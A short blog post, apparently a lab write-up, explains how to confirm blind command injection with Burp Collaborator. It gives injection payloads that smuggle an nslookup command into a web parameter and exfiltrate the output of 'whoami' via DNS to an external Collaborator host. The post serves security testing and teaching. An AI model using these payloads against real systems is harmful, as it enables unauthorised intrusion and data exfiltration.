Recently, I was doing a few labs on Command Injection. It was mentioned that in most situation, the tester will not be able to see the response of the injected command. Therefore, alternative ways will need to be explored to check if the Blind Command Injection exists in the web application.
One of the ways that we can validate the existence of the Blind Command injection is to inject a nslookup command. In this scenario, we can use Burp Collaborator to validate if the web application has performed a DNS lookup. Please refer to this lab for more details.
First, you will need to click “Copy to clipboard” in the Burp Collaborator client. Insert the copied URL into the vulnerable parameter. Send this request to the web server.
Payload: & nslookup <INSERT BURP COLLABORATOR URL HERE> &
Example: & nslookup abcde1234.burpcollaborator.net. &
Secondly, you can click “Poll now” in the Burp Collaborator client. If there is a new DNS lookup appearing, it means that the Blind Command Injection is working.
In addition, you can also extract the output of the command using the below payload:
& nslookup `whoami`.<INSERT BURP COLLABORATOR URL HERE> &
In Burp Collaborator, we can see that there was a DNS lookup to the domain (containing the whoami result).
Be First to Comment